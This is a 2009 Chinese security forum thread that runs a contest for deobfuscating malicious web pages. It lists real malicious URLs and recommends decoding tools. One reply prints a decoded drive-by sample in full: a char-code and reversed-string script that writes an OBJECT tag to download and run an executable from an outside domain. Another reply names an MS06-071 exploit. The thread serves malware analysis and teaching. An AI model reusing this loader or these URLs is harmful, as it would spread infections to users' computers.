查看: 5152|回复: 26
收起左侧

[其它] [解密悬赏][第8期][结束]

[复制链接]
qianwenxiang
发表于 2009-1-6 19:41:56 | 显示全部楼层 |阅读模式
宗旨:
让更多人了解如何解密网马

规则:
1、Hunter不能参加活动
2、上次活动成功解密者,本次活动不能参加
3、必须把所有木马地址全部解出,不完全解密且所发URL之前没有人解出者得到对应网址的25%经验
4、最好有解密软件日志,如果没有,请发出具体解密过程
5、当第一个人成功完全解密后,将根据难度给予其相应经验,所有URL全部解完之后本帖将锁定
6、如果有违反1~2条规则的情况,本帖随即锁定,之后成功解密的作废!
7、锁定后,会重新修改本次的解密地址,并且开帖!



解密地址(替换HXXP为HTTP):

hXXp://www.oak123.cn/mm/ActivxX.htm (完成)
一次解完(包含解密步骤)=10
分步(即未解完情况)=每步3

(共计2个步骤/已完成by vistabull @ 2L)

hXXp://www.pbanking.ru/ (完成)
一次解完(包含解密步骤)=26
分步(即未解完情况)=每步5
(共计4个步骤/已完成by 250662772 @ 19L)
有效性:
> 代码: 读取代码:hxxp://www.pbanking.ru/
= 长度:44872成功
> 代码: 读取代码:hxxp://www.oak123.cn/mm/ActivxX.htm
= 长度:1167成功

注意:这些地址含有恶意软件,可能会危害到您的计算机。请不要直接打开,否则因此造成的一切后果我们概不负责!
参考解密工具:
FreShow(英文)、
Redoce 1.5(中文)、malzilla (英文,但是乃神器也)
http://glacierlk.cn/openlab/jm.htm
参考解密教程:
http://bbs.kafan.cn/viewthread.php?tid=387608
http://bbs.kafan.cn/viewthread.php?tid=220550

http://www.jimmyleo.com/share/FreShow!.rar(推荐!不会用FreShow的可以看看)
XMatence
发表于 2009-1-6 19:54:29 | 显示全部楼层
hXXp://www.oak123.cn/mm/ActivxX.htm

沙盘进入

javascript: greysign=document.documentElement.outerHTML;document.write("<body></body>");document.body.innerText=greysign;

得到代码

<HTML><HEAD>
<SCRIPT>
t="60,116,101,120,116,97,114,101,97,32,115,116,121,108,101,61,34,100,105,115,112,108,97,121,58,110,111,110,101,59,119,105,100,116,104,58,48,112,120,59,104,101,105,103,104,116,58,48,112,120,59,34,32,105,100,61,113,113,50,56,48,48,57,53,57,53,48,62,13,10,10,13,62,116,99,101,106,98,111,47,60,62,34,49,57,49,34,61,116,104,103,105,101,104,32,34,48,48,56,34,61,104,116,100,105,119,32,34,49,44,48,44,48,44,49,61,110,111,105,115,114,101,118,35,101,120,101,46,109,47,109,109,47,110,99,46,51,50,49,107,97,111,46,119,119,119,47,47,58,112,116,116,104,34,61,101,115,97,98,101,100,111,99,32,34,69,48,55,50,57,69,53,66,66,48,57,55,45,48,49,52,57,45,55,51,70,52,45,48,56,67,68,45,55,69,69,68,67,48,69,55,58,100,105,115,108,99,34,61,100,105,115,115,97,108,99,32,116,99,101,106,98,111,60,60,47,116,101,120,116,97,114,101,97,62,60,115,99,114,105,112,116,32,108,97,110,103,117,97,103,101,61,118,98,115,62,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,115,116,114,114,101,118,101,114,115,101,40,113,113,50,56,48,48,57,53,57,53,48,46,118,97,108,117,101,41,41,60,47,115,99,114,105,112,116,62,13,10"
t=eval("String.fromCharCode("+t+")");
document.write(t);</SCRIPT>

<META content=HMDIUJJIVN name=SKYPE_FRAMEID>
<META content=HMDIUJJIVN name=SKYPE_FRAMEID>
<META id=skype_tb_marker_id content=metacontent name=SKYPE_PARSING_HAS_FINISHED></HEAD>
<BODY><TEXTAREA id=qq280095950 style="DISPLAY: none; WIDTH: 0px; HEIGHT: 0px">

&gt;tcejbo/&lt;&gt;"191"=thgieh "008"=htdiw "1,0,0,1=noisrev#exe.m/mm/nc.321kao.www//:ptth"=esabedoc "E0729E5BB097-0149-73F4-08CD-7EEDC0E7:dislc"=dissalc tcejbo&lt;</TEXTAREA>
<SCRIPT language=vbs>document.write(strreverse(qq280095950.value))</SCRIPT>

<OBJECT codeBase=http://www.oak123.cn/mm/m.exe#version=1,0,0,1 height=191 width=800 classid=clsid:7E0CDEE7-DC80-4F37-9410-790BB5E9270E></OBJECT></BODY></HTML>

评分

参与人数 1经验 +10 收起 理由
qianwenxiang + 10 加分鼓励

查看全部评分

雨宫优子
发表于 2009-1-6 19:56:02 | 显示全部楼层
malzilla太强大了...
雨宫优子
发表于 2009-1-6 19:59:04 | 显示全部楼层
我的万能法也很强大
2楼那位就是切实学习万能法的好典范...
xiaoxmj
发表于 2009-1-6 20:00:04 | 显示全部楼层
像灰鸽子
zzh161
发表于 2009-1-6 20:05:52 | 显示全部楼层
地一眼看过去,第一个吓了我一跳 隐身娃你太阴险了
XMatence
发表于 2009-1-6 20:07:24 | 显示全部楼层
第二个ie进去死机了~~
qianwenxiang
 楼主| 发表于 2009-1-6 20:08:39 | 显示全部楼层

回复 6楼 zzh161 的帖子

第一个把你吓一大跳?你那个CACE搞定没。。
雨宫优子
发表于 2009-1-6 20:12:08 | 显示全部楼层
Microsoft 安全性公告 MS06-071
Microsoft XML Core Services 的弱點可能會允許遠端執行程式碼 (928088)
第二个的...
zzh161
发表于 2009-1-6 20:22:05 | 显示全部楼层

回复 8楼 qianwenxiang 的帖子

我曾经犹豫很久,逆序这个东西有人会用吗?
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-17 08:35 , Processed in 0.140355 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表